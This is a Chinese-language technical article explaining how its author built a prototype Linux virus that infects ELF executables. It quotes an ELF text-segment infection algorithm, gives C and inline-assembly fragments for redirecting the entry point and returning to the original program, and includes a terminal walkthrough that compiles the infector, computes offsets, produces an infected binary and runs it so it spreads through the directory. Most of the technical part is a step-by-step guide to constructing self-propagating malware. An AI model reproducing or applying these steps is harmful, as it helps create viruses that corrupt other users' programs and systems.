剖析Linux病毒原型工作過程和關鍵環節

　　一、 介紹

　　寫這篇文章的目的主要是對最近寫的一個Linux病毒原型代碼做一個總結，同時向對這方面有興趣的朋友做一個簡單的介紹。閱讀這篇文章你需要一些知識，要對ELF有所了解、能夠閱讀一些嵌入了匯編的C代碼、了解病毒的基本工作原理。

　　二、 ELF Infector (ELF文件感染器)

　　為了制作病毒文件，我們需要一個ELF文件感染器，用於制造第一個帶毒文件。對於ELF文件感染技術，在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》一文中已經有了一個非常好的分析、描述，在這方面我還沒有發現可以對其進行補充的地方，因此在這裡我把Silvio Cesare對ELF Infection過程的總結貼出來，以供參考：

The final algorithm is using this information is.
* Increase p_shoff by PAGE_SIZE in the ELF header
* Patch the insertion code (parasite) to jump to the entry point
(original)
* Locate the text segment program header
* Modify the entry point of the ELF header to point to the new
code (p_vaddr + p_filesz)
* Increase p_filesz by account for the new code (parasite)
* Increase p_memsz to account for the new code (parasite)
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset by PAGE_SIZE
* For the last shdr in the text segment
* increase sh_len by the parasite length
* For each shdr who's section resides after the insertion
* Increase sh_offset by PAGE_SIZE
* Physically insert the new code (parasite) and pad to PAGE_SIZE, into
the file - text segment p_offset + p_filesz (original)

　　在Linux病毒原型中所使用的gei - ELF Infector即是根據這個原理寫的。在
附錄中你可以看到這個感染工具的源代碼: g-elf-infector.c

g-elf-infector與病毒是獨立開的，其只在制作第一個病毒文件時被使用。我簡單介
紹一下它的使用方法，g-elf-infector.c可以被用於任何希望--將二進制代碼插入到指定文件的文本段，並在目標文件執行時首先被執行--的用途上。g-elf-infector.c的接口很簡單，你只需要提供以下三個定義：

* 存放你的二進制代碼返回地址的地址，這裡需要的是這個地址與代碼起始
地址的偏移，用於返回到目標程序的正常入口
#define PARACODE_RETADDR_ADDR_OFFSET 1232

* 要插入的二進制代碼（由於用C編寫，所以這裡需要以一個函數的方式提供）
void parasite_code(void);

* 二進制代碼的結束（為了易用，這裡用一個結尾函數來進行代碼長度計算）
void parasite_code_end(void);

parasite_code_end應該是parasite_code函數後的第一個函數定義，通常應該如下表示
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {}

　　在這裡存在一個問題，就是編譯有可能在編譯時將parasite_code_end放在parasite_code
地址的前面，這樣會導致計算代碼長度時失敗，為了避免這個問題，你可以這樣做
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {parasite_code();}

　　有了這三個定義，g-elf-infector就能正確編譯，編譯後即可用來ELF文件感染

face=Verdana>

　　三、病毒原型的工作過程

　　1 首先通過ELF Infector將病毒代碼感染到一個ELF文件，這樣就創造了第一
個帶毒文件，後續的傳播就由它來完成。

　　2 當帶毒文件被執行時，會首先跳到病毒代碼開始執行。

　　3 病毒代碼開始發作，在這個原型裡，病毒會直接開始傳播。

　　4 病毒遍歷當前目錄下的每一個文件，如果是符合條件的ELF文件就開始感染。

　　5 病毒的感染過程和ELF Infector的過程類似，但由於工作環境的不同，代碼的實現也是有較大區別的。

　　6 目前傳染對ELF文件的基本要求是文本段要有剩余空間能夠容納病毒代碼，如果無法滿足，病毒會忽略此ELF。對於被感染過一次的ELF文件，文本段將不會有剩余的空間，因此二次感染是不會發生的。

　　7 病毒代碼執行過後，會恢復堆棧和所有寄存器（這很重要），然後跳回到真正的可執行文件入口，開始正常的運行過程。

　　上面對病毒原型的工作過程的介紹也許顯得千篇一律了，和我們早就熟知的關於病毒的一些介紹沒有什麼區別？是的，的確是這樣，原理都是類似的，關鍵是要看實現。下面我們就將通過對一些技術問題的分析來了解具體的實現思路。

　　四、關鍵技術問題及處理

　　1 ELF文件執行流程重定向和代碼插入

　　在ELF文件感染的問題上，ELF Infector與病毒傳播時調用的infect_virus思路是一樣的：

　　* 定位到文本段，將病毒的代碼接到文本段的尾部。這個過程的關鍵是要熟悉ELF文件的格式，將病毒代碼復制到文本段尾部後，能夠根據需要調整文本段長度改變所影響到的後續段(segment)或節(section)的虛擬地址。同時注意把新引入的文本段部分與一個.setion建立關聯，防止strip這樣的工具將插入的代碼去除。還有一點就是要注意文本段增加長度的對齊問題，見ELF文檔中的描述：
p_align
As ``Program Loading'' later in this part describes, loadable
process segments must have congruent values for p_vaddr and
p_offset, modulo the page size.

* 通過過將ELF文件頭中的入口地址修改為病毒代碼地址來完成代碼重定向：
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;

　　2 病毒代碼如何返回到真正的ELF文件入口

　　方法技巧應該很多，這裡采用的方法是PUSH+RET組合：

__asm__ volatile (
...
"return:nt"
"push $0xAABBCCDDnt" /* push ret_addr */
"retn"
::);

　　其中0xAABBCCDD處存放的是真正的程序入口地址，這個值在插入病毒代碼時由感染程序來填寫。

　　五、 新編譯環境下的調試方法

grip2@linux:~/tmp/virus> ls
g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c Makefile parasite-sample.c parasite-sample.h

調整Makefile文件，將編譯模式改為調試模式，即關掉-DNDEBUG選項
grip2@linux:~/tmp/virus> cat Makefile
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
clean:
rm *.o -rf
rm foo -rf
rm gei -rf

編譯代碼
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG

先獲取病毒代碼長度，然後調整gvirus.c中的#define PARACODE_LENGTH定義
grip2@linux:~/tmp/virus>. /gei -l <.這裡獲取病毒代碼的長度
Parasite code length: 1744

獲取病毒代碼開始位置和0xaabbccdd的地址，計算存放返回地址的地址的偏移
grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
8049427: 68 dd cc bb aa push $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei|grep ""
08048d80 :
8049450: e9 2b f9 ff ff jmp 8048d80
grip2@linux:~/tmp/virus> objdump -d gei|grep ":"
08048d80 :

0x8049427與0x8048d80相減即獲得我們需要的偏移，
用這個值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值

重新編譯
grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG

grip2@linux:~/tmp/virus> ls
gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h

建立一個測試目錄，測試一下
grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei foo
grip2@linux:~/tmp/virus/test> cp foo h

制作帶毒程序
grip2@linux:~/tmp/virus/test>. /gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo

運行帶毒程序
grip2@linux:~/tmp/virus/test>. /h
.
..
gei
foo
h
.backup